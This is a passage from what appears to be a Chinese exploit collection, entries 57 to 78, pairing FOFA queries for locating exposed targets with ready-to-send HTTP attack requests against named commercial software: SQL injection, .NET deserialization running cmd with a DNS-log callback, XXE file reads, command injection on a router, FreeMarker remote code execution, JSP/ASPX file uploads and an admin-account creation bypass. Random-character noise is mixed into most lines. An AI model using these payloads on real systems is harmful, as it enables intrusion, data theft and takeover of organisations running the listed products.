% L. Q; I" }& ^% s1 [& s7 n* dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
7 R& T$ W! S7 Z4 j, m& UContent-Type: application/json
) L% c; t% [; V$ I! {( A; T+ P) f% M1 k6 r" j U/ S
{* n; w5 n3 A5 M9 r
"storeID":{6 H: o) z8 R9 }1 a
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
' T: _: M/ o" E5 l3 ? "MethodName":"Start",
$ q- B1 ]; h5 P: r! P "ObjectInstance":{
* p+ h* ^! d0 I9 R. | "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
4 y- g M; a8 K' W: h3 z5 ~: c "StartInfo": {6 M Q9 v/ V$ O: h) G/ }6 T
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
2 |8 C7 ]3 b) ]' ^/ Z& s4 }9 ? "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
' Y8 J; P) p$ Y6 G }) B/ R9 y# o+ k" J7 [
}
' ~1 _6 E+ c: ?# G& K7 P }
, D: d+ m7 w. a9 T}
* W/ o1 t4 N) ^/ Y4 @( k P6 J, n* V4 A: p. \" @
* f( w* w+ [; P6 ]4 m/ |57. 畅捷通T+ keyEdit.aspx SQL注入2 A; h* g' y" P7 D
FOFA:app="畅捷通-TPlus"+ C( W) p6 u5 |( n
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1* J! z9 i: F4 B5 l
Host: host
6 p$ [; {* m9 Z$ w5 h) h3 Y4 |User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 W1 t! E) o7 x: k8 o' p+ _
Accept-Charset: utf-8
- I% g7 U3 v( [; x6 ]Accept-Encoding: gzip, deflate8 w2 O1 R: }0 g/ K
Connection: close8 G& q( b T, w% O n* S2 u7 D; _
3 l- B; n/ c# B* \! P1 y
3 n" A3 L* D6 O3 q8 f# P58. 畅捷通T+ KeyInfoList.aspx sql注入
) z. R* W v% S- {FOFA:app="畅捷通-TPlus"
- {. |. A# }( Z E. E3 B/ mGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
9 G+ s' D' L4 c# C y. CHost: your-ip% X, L7 O' d0 x$ e; _0 |
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36; j, `8 ]0 z$ E' l- u2 U5 j. q
Accept-Charset: utf-8
3 P4 k) T r+ w: E' K1 L9 tAccept-Encoding: gzip, deflate$ R4 g8 e( o, S3 D; ]
Connection: close
# [5 g7 s# ^& I b* ]3 j% w) O: h7 z' G
& J4 _1 q" s5 C i. ?4 B3 E! Y' N P3 {
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
7 l3 D5 l% t& x/ l5 e; d5 aFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
; x3 o5 P! i, V8 ^. z" sPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.19 A% B7 u2 b, s5 w) C" z8 m H" j
Host: 192.168.86.128:90903 K" T, p9 A" M2 ]7 W: b+ D1 t
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
. D- @. k4 ~. G* DConnection: close
. a$ m9 i+ W. r$ r) Q1 NContent-Length: 1669- w7 c5 D6 |4 E3 H0 H# N/ r, O
Accept: */*) {* F* h1 y; @: v9 C
Accept-Language: en
( Q3 B! p2 {9 m5 s8 t+ \( {7 S* DContent-Type: application/x-www-form-urlencoded$ f6 R3 w. K; v2 m/ p
Accept-Encoding: gzip5 N9 j' M- U, K1 b$ i' p% n
. s2 Y! w$ V' QPAYLOAD7 |. ~2 {1 |( B, f* D
$ D: A+ N; _6 |' j. p" c, D
1 S& b) ^! ^$ D' j9 R" m
60. 百卓Smart管理平台 importexport.php SQL注入$ O1 ^& w! ]: G" U. _ u
FOFA:title="Smart管理平台". \. v2 q- i2 V
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.16 W# Y0 D3 X) e! S% J7 d
Host:
/ ] G( i, [1 s% X" N: fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
3 O$ n' W2 k0 |# x* {$ k7 ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 c' n7 B2 O- b) Z. v( W7 d! m
Accept-Encoding: gzip, deflate& g8 u5 w/ }. X
Accept-Language: zh-CN,zh;q=0.9: l% R: i% w% g; r) p' p7 x
Connection: close% t9 B1 _) H# v" [
8 y$ I) x I2 j2 a' |4 n9 @
8 D, u) n! A& n$ E3 V2 y61. 浙大恩特客户资源管理系统 fileupload 任意文件上传0 M3 T7 T4 N: m) D7 `3 e9 R
FOFA: title="欢迎使用浙大恩特客户资源管理系统"- h+ k2 e1 C2 |
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.16 K) p& t# `! y; t
Host: x.x.x.x
8 J( q# X' u2 h( h) D& cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# `" f. |3 N% o0 j; ?1 gConnection: close" @" B/ X0 A, A7 B
Content-Length: 27! N9 O% ~1 [+ L( ^2 e
Accept: */*
3 w$ L+ R% U$ j4 ^1 b$ N# e& `6 aAccept-Encoding: gzip, deflate2 Z6 Q7 r4 S. `3 O y8 a
Accept-Language: en! p1 j( ~4 e0 K3 Z+ A9 \
Content-Type: application/x-www-form-urlencoded+ }' ~: R+ @+ i3 N$ y' l
9 l& `1 ?8 x# ^ o& C( U4 G7 G! S8uxssX66eqrqtKObcVa0kid98xa
' L+ B$ Z' v3 F& Z0 y7 d. j6 L( Z$ V& R$ H6 Q- b. @4 W4 T9 S5 F+ z
" r7 D* n: Q" E) U& F: t: _5 \% ~
62. IP-guard WebServer 远程命令执行" P+ @6 D, w; M. _
FOFA:"IP-guard" && icon_hash="2030860561"
# \& L! g" V0 SGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.18 d$ x" u! l- G/ Y0 `, _7 M
Host: x.x.x.x
- X7 o: G9 Z% ~1 F0 F3 FUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
6 I, }* E/ w# W2 B0 r+ L mConnection: close
6 V: j# G& w& H! Q# J7 l) H* T5 AAccept: */*& Q% p/ K: t4 ]6 ]; P2 C3 V
Accept-Language: en
5 \) Z5 h* d! q G' f: P1 CAccept-Encoding: gzip- R G' H7 y1 }8 r' {) j
8 [1 C1 f& S7 @# B! _( H# a( w0 E8 V* `
访问( {% K$ a4 O; J: `/ y
( Y7 V6 M5 b$ W' g& l; \) A
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
2 k0 w8 i. W! N1 f7 b7 aHost: x.x.x.x8 P+ o I& Q: M% [* d
0 T6 n; \9 Z1 i/ h z4 O I6 `: o9 h) A* r
63. IP-guard WebServer任意文件读取
% R8 \5 u1 S5 x( qIP-guard < 4.82.0609.08 M8 N9 ^6 _2 B5 ]4 \ M& K$ `
FOFA:icon_hash="2030860561"
" T$ Y' [7 }5 p) VPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
+ x5 y4 A! O; A1 H, f$ S BHost: your-ip8 ]" V+ t) ^2 g+ H- G: X" L" P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.369 R( t$ ?6 s+ O) ~; H( E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 t! k3 _8 K% a9 AAccept-Encoding: gzip, deflate
; O, r* G$ T: W- S Z9 GAccept-Language: zh-CN,zh;q=0.9
- w+ X) U* t# w, gConnection: close
5 s: U/ p" q5 F) o. \8 }Content-Type: application/x-www-form-urlencoded
9 J& I, x1 {% j7 c$ u- s- k
8 k5 o" S& Q6 r' c. |% ]( y* s4 Opath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
N9 y5 ~" d* ~2 S$ |" q( |' j7 j! ^/ w
64. 捷诚管理信息系统CWSFinanceCommon SQL注入# z. V1 |5 H$ p
FOFA:body="/Scripts/EnjoyMsg.js"# W! q. M5 E8 r9 m, T
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.12 q4 f7 s( U$ T9 R4 K+ O; D
Host: 192.168.86.128:9001) [) F* a$ Y& e& h7 R$ L
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
{) q; ~4 ?0 t" {5 r. cConnection: close4 r1 V4 y: _+ p' n# O
Content-Length: 3691 W4 C, ^: E1 _9 B
Accept: */*
7 W- P+ ~; r. d. V0 S4 l3 l* bAccept-Language: en
& R* q* P% Q6 K/ }Content-Type: text/xml; charset=utf-8, j7 i" Y/ @ t: u* g; c3 e9 }
Accept-Encoding: gzip
2 u* Z8 n5 t/ l/ j' V& l* U* O2 |: P% d/ L, {# N" ~
<?xml version="1.0" encoding="utf-8"?>
! \7 G5 o% {/ a* s; ^/ }" |<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">" h3 [. J' @ B& `, O; j6 g
<soap:Body>; c9 v/ x/ s4 ^
<GetOSpById xmlns="http://tempuri.org/">/ o* E0 R1 @8 }3 d) X' f B
<sId>1';waitfor delay '0:0:5'--+</sId>5 E8 C$ `+ o- `( F8 E
</GetOSpById># }8 x. e# E: d1 R! E2 c$ \
</soap:Body>
! ?& r/ r3 y8 G' Y- ]</soap:Envelope>
- J2 L, }; j Z+ B: k
" q1 \9 T7 |6 ^! O4 U1 U" l; r4 j% D+ R! h! O
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
8 V) V) `, v$ v1 P7 [& e+ IFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
# P7 n2 R) Z+ E2 o+ s, Y: u; h响应200即成功创建账号test123456/123456- s9 L: V' Z1 h- `! n- Z
POST /SystemMng.ashx HTTP/1.1! |+ w" Q( ~" n' I: s
Host:$ n: b( k" [6 ~. V/ a
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)2 p6 d1 f# K% `
Accept-Encoding: gzip, deflate
( q" ~) D, ? }- @5 M( M% _* lAccept: */*
, `. T2 C0 z9 T. p1 z+ X4 b( L4 IConnection: close3 O0 l: S8 G6 g, {0 [
Accept-Language: en
3 T) \- Q8 T* o: qContent-Length: 174
, u0 o' V! ?5 R* r+ E$ ^3 @) { P1 B# P% T0 B/ D
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
/ R5 l3 |( Q# c p
2 ?# m v0 S. k7 x# l8 p1 _4 k/ o
; O/ @3 Z+ g G/ G66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入" a4 k8 R0 |: b/ [
FOFA:app="万户ezOFFICE协同管理平台"
$ E1 x; K Z3 E& F2 Q6 ]
* m) F0 ?8 p1 L+ \- `GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
- _, j3 i' N; f/ _% z( eHost: x.x.x.x) T! g1 H: G3 ^3 R' ^" {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
% K& [4 r, @ V3 _ ~' w$ ZConnection: close
. @4 j$ e- n1 ]Accept: */*& s% Y+ D4 g* @
Accept-Language: en
4 _6 A/ u n% r7 ^: I( w. l: k, c! ^Accept-Encoding: gzip* Z* c1 ?- C) Q: f* ]8 C
" h9 O: T) b/ R. l" R9 \. E6 D1 h3 W4 c- f G( P) y
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
: ?, y% A6 M6 f0 i! Q, s
/ ~8 h% [- l8 n! d- s67. 万户ezOFFICE wpsservlet任意文件上传0 x. A7 W- b, H3 G% @7 f3 h, c: F
FOFA:app="万户网络-ezOFFICE" Z! |" C8 p* K0 e z
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
; ]* \( k- ^8 k) sPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
) N& y5 C1 {& a; Z0 rHost: x.x.x.x
# W* _7 L5 S o# T- MUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.08 L9 D9 t9 m& G* T
Content-Length: 1730 f: B, _1 Q' u7 N: r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.88 D( \2 n) K4 l
Accept-Encoding: gzip, deflate! V/ N, Y2 T% X2 v3 Q, R5 ~; G- j Z
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
; y3 D0 Q( e X, l0 ^3 N( c) s5 l* nConnection: close
. t: `8 v* u, Z6 E9 O; x$ |Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp8 i( z2 a$ O$ J" s8 p+ W
DNT: 1
1 n& @+ A. X V5 n; ^Upgrade-Insecure-Requests: 1
% ~1 Y7 w9 L3 ]: J
7 S/ Q1 G2 w: V% S9 M0 i" Y$ Q--ufuadpxathqvxfqnuyuqaozvseiueerp
; d' `5 L* h( XContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"0 i3 I) T9 b4 @7 k3 \/ i6 @( s3 W
- V8 E N) b, _* G# J$ l- e
<% out.print("sasdfghjkj");%>
5 F- r; X8 T* W& b/ P$ g--ufuadpxathqvxfqnuyuqaozvseiueerp--
& A) I6 G' ?( T: ^9 R/ a. |# k# {3 ^) f' H# c( i
2 X) [2 k5 o0 h G! u. ?! t
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
1 Q* [1 @) I' t9 q) Q; T Q/ M2 B1 Y
68. 万户ezOFFICE wf_printnum.jsp SQL注入9 B5 p; F7 y# j1 h+ h6 }: Z
FOFA:app="万户ezOFFICE协同管理平台"! d. ~. l0 g. B% x1 r0 f/ W0 Y
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
+ [# Q. ~. B3 d0 CHost: {{host}}" E( W; n, I: d! T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36( y$ q0 ?5 l6 m4 }" @ Q4 m
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8( y+ e# w) e$ n$ C8 ?* y7 t
Accept-Encoding: gzip, deflate
% ?2 R" x" b: f. q. fAccept-Language: zh-CN,zh;q=0.94 [% C7 ]$ O1 D4 F A [, H( ]
Connection: close/ o( u0 B! G0 m
+ I- n- ~8 u7 _1 v" C5 Y. B* l% \
* H3 d, s& ?: e# O69. 万户 ezOFFICE contract_gd.jsp SQL注入/ H# N% S+ }- w3 r8 d
FOFA:app="万户ezOFFICE协同管理平台"
1 f' E4 ^! Q- w! _$ {GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1( C1 n% q, v+ j+ P
Host: your-ip
8 V) B3 a' h" DUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
, u- k4 N- [! @Accept-Encoding: gzip, deflate% F3 d) S/ w& ]: v% Y3 p
Accept: */*# l& A9 w' O: e6 {9 z4 Z$ F2 F
Connection: keep-alive
+ ^! Y% O9 }/ P
, K/ k. Q9 o( K7 e9 P* K: L K) G% {$ l9 w( K* A5 R
70. 万户ezEIP success 命令执行6 h9 ~) p8 b5 S
FOFA:app="万户网络-ezEIP"4 q( t% {, R8 D0 H
POST /member/success.aspx HTTP/1.1% z H- X( h6 U6 ?( ^- Q! D4 r
Host: {{Hostname}}# q- l! ~5 G! q: H2 R4 E5 }+ C- T9 F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36( B9 o( i$ n4 r \) y
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
: Y, R" P9 q) [7 qContent-Type: application/x-www-form-urlencoded
: Y( V) n* W* A% D6 z1 zTYPE: C W% x% _& M9 H
Content-Length: 167029 c6 `2 Y! p0 w- H) j
Y' E* [. L8 g- X9 _9 Z8 h( T__VIEWSTATE=PAYLOAD
9 G6 H5 o: h, B8 x' e* a) g2 Y Q3 I( ^- K
8 f; v J7 e, f m
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入; k* I: `: C' n, g
FOFA:body="PM2项目管理系统BS版增强工具.zip"
5 T) o9 g9 _ q! [3 k6 s7 KGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1' q1 {) y% }+ C1 G" e
Host: x.x.x.xx.x.x.x
' [0 P' {. `; @) O: lUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36, J3 h, t5 r& A( N
Connection: close9 A- B: n4 U" H( j; ^( t% H8 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% ^+ G: S I3 m9 H- HAccept-Encoding: gzip, deflate, Z( q: H U+ R: |8 O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
d' c' N* w8 q0 o0 Q% ]Upgrade-Insecure-Requests: 1
0 r$ q, R5 t1 b
8 A7 m! Y9 o$ _4 q' V
, |# B2 L7 P: u5 V9 k72. 致远OA getAjaxDataServlet XXE. r' k1 V0 s6 L# m+ k* \
FOFA:app="致远互联-OA"
/ F& t# G! }; L9 z& BPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1: p! d' C2 @& u6 W1 ^2 ~4 `- w
Host: 192.168.40.131:8099$ I; e! r% h! Z* c/ }+ P
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36+ o8 u& @; A. h m" R. g6 I
Connection: close' X2 T9 v1 T: }2 b
Content-Length: 583
4 E# C3 U8 S) C8 W& n7 ^# eContent-Type: application/x-www-form-urlencoded
; v ~0 J. g; v" T# `# WAccept-Encoding: gzip
9 c9 ^/ ]. H5 o+ P" B- `8 U
7 \4 ?' D4 g5 X" D( i* |8 hS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
* A; v, e( X2 V1 q" {" q
% O( J# Y3 E1 d V" e9 ~2 b) k* D4 L# G: L9 ]$ A5 m
73. GeoServer wms远程代码执行
; Y/ B* |! u( J$ Q% U* x4 CFOFA:icon_hash=”97540678”
' V' Y& a5 e" J# oPOST /geoserver/wms HTTP/1.15 U; u, o4 F3 Z3 b$ r, n( v2 x
Host:/ X* M! o0 ~# a! B- I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
9 G: p& k7 n* rContent-Length: 19810 U" Q2 ^' ^% @! C4 {. u
Accept-Encoding: gzip, deflate- }) P- s) ?2 m& a- j( ?; l
Connection: close& m* u% a$ E: [$ C4 }# k
Content-Type: application/xml
" P( r4 U' v3 `, ^SL-CE-SUID: 31 W0 H0 L. B- y: R( ^" [% N& y
" F5 v8 q1 l" f( [, N, S. KPAYLOAD4 [, G7 d! W3 D* E
2 Z. X+ Y- ^( ?2 {9 l% i3 u% J3 }& \# L
74. 致远M3-server 6_1sp1 反序列化RCE( K1 \! |) I/ K, p" Q
FOFA:title="M3-Server"
; d& M/ \2 S. @2 C/ d0 \) Z b9 XPAYLOAD+ j/ W4 Z4 `1 N: V& F
8 O. @) T* T& Z9 H2 B
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE% z# G/ p$ |3 K3 @- g9 ~2 i
FOFA:app="TELESQUARE-TLR-2005KSH"" |/ r' ]' t: ~. x& G7 b; z3 w
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
6 l* d8 e+ F3 {8 Y5 pHost: x.x.x.x" c$ T6 A e8 \. Y b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# U& m3 e- {. C3 c F8 j2 v
Connection: close$ ?. V% a6 J1 I) h% m
Accept: */*" d. y1 z! t8 @
Accept-Language: en. M6 B: N. D8 b3 h9 B3 M6 |
Accept-Encoding: gzip
+ w; R; q) R& B5 B7 F) K8 i$ R$ I
* X$ q9 \/ M7 U" A0 M: _
, o! _ T, k6 r4 V: d( O- dGET /cgi-bin/test28256.txt HTTP/1.1. i6 n( f% Q" c1 N6 W; E- g
Host: x.x.x.x. K$ `4 b; g2 ~5 W% N4 u
( D, o& G4 M2 S7 K3 A" m, x( `& s( X2 j! t: H6 }
76. 新开普掌上校园服务管理平台service.action远程命令执行
8 p+ d) e5 V' I# g- H; n% bFOFA:title="掌上校园服务管理平台"
! V: I. ]" M$ L5 _" v9 D2 {POST /service_transport/service.action HTTP/1.1
6 E# Z9 N! _7 iHost: x.x.x.x
! s3 r6 h' E4 Z! k" r' ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
- N$ q* s7 v8 sConnection: close
; ?: i8 s" w; a0 H: `+ U: u$ GContent-Length: 211
/ H i+ V3 {/ g* H' N1 l+ s0 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 p( [* F E1 k; ]+ z. u# uAccept-Encoding: gzip, deflate! Z$ |0 l0 w* y8 I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 w( }& e7 o% V! jCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
5 |8 z: z, q, f& F3 }# c) MUpgrade-Insecure-Requests: 1
, ~% N# x. L. Z, s5 B0 C- {/ L8 {4 V7 k( g8 P# R' X* F
{
4 V+ L8 H3 h0 E6 Q"command": "GetFZinfo",
$ ?: {/ D# A3 H8 u "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
5 v/ C9 @' I- ?. p ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
+ K0 {0 Y; B7 Q! ~& ?* w& r% G}
1 d) C$ w, h" ^; b H. K+ ]% |5 B' r
$ l- T; |! [1 z; K; k6 a0 |
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
0 W% U7 k6 q' D. @% u8 @Host: x.x.x.x3 ?8 {2 x) }8 o% R3 O# S+ P4 a3 h$ f
; ~& F5 l8 |1 @/ z+ f9 ^8 ~
, _3 g8 u u( \, n: O7 V" `4 t
9 P+ G3 Y/ N2 N77. F22服装管理软件系统UploadHandler.ashx任意文件上传 C! H3 O" p: [' n
FOFA:body="F22WEB登陆"" i* I( A; e8 w
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1( J6 u' L7 G6 _ j: D; z/ M" ~
Host: x.x.x.x- W9 s; G+ `* T4 t$ u0 h$ h# P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36$ B& K2 X: v+ _ M& Q
Connection: close' ~: h( U J7 m" p: m( c
Content-Length: 433
& G& x! C/ F. X* R SAccept: */* P; }3 u9 n2 I& V
Accept-Encoding: gzip, deflate
$ r$ r/ r6 @. j% [) d2 H3 [+ KAccept-Language: zh-CN,zh;q=0.97 [! Z: H6 C& H: J& l8 |8 ?
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix1 H; S, e: J0 J7 r
9 g) J3 p6 ?; V4 b/ e" E! T------------398jnjVTTlDVXHlE7yYnfwBoix
9 K+ p: |! m$ A0 w0 t' sContent-Disposition: form-data; name="folder"6 A G6 i2 a3 `# G9 m9 o2 L
+ k, @" O L8 R) o3 i
/upload/udplog& |7 E" { h# t2 b
------------398jnjVTTlDVXHlE7yYnfwBoix
3 }' J0 \2 n) d) ~Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
( X* A0 b6 i0 Q4 U1 h9 F/ `Content-Type: application/octet-stream3 P; f. {0 r4 i
2 i4 @! x/ G% Q/ m0 L: b7 q
hello12345675 { t( y6 a8 q8 R: S+ w
------------398jnjVTTlDVXHlE7yYnfwBoix
/ ]- Z- n7 o( z& |Content-Disposition: form-data; name="Upload"
; g& ?* L1 N0 R4 v
: h T j! d t. A2 G3 _0 K* \Submit Query$ j; y+ ^5 _: w3 f' V) ?
------------398jnjVTTlDVXHlE7yYnfwBoix--
+ f d, S E8 Z) | C! ~2 E# z/ |1 X7 I$ S3 A4 ]1 y
3 g" {: z8 Z3 {0 ^5 m* Z
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传" A( F1 `( Z p) \- s" i
FOFA:icon_hash="2001627082"
3 m' p# d% d) D ~! vPOST /Platform/System/FileUpload.ashx HTTP/1.1
* C$ K) G* z: g9 V. W- QHost: x.x.x.x1 p1 ~# N9 {/ E& ?4 I+ h' i( Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 S+ P# X. }/ r* L0 K/ eConnection: close/ h4 {" ^' G0 y" D d- g1 W1 U0 X
Content-Length: 336
5 X2 s6 g' M' Z# z2 z# Y8 }Accept-Encoding: gzip
( H. X2 }6 K8 V. k7 {; t" m4 `/ ?Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l7 M9 J8 m' }) ~0 Y
; x9 ]. ~' t% X9 R) z) D9 Z& z------YsOxWxSvj1KyZow1PTsh98fdu6l
' K; z8 E% c8 ^+ y6 s- r1 YContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
& `+ _6 K; I; ]/ M% ?Content-Type: image/png0 Z1 e# D& ]$ z# \/ j# ]! y
% y4 f0 q) e3 m: y4 aYsOxWxSvj1KyZow1PTsh98fdu6l5 T4 C, I- x# q. q/ X( C& ^
------YsOxWxSvj1KyZow1PTsh98fdu6l
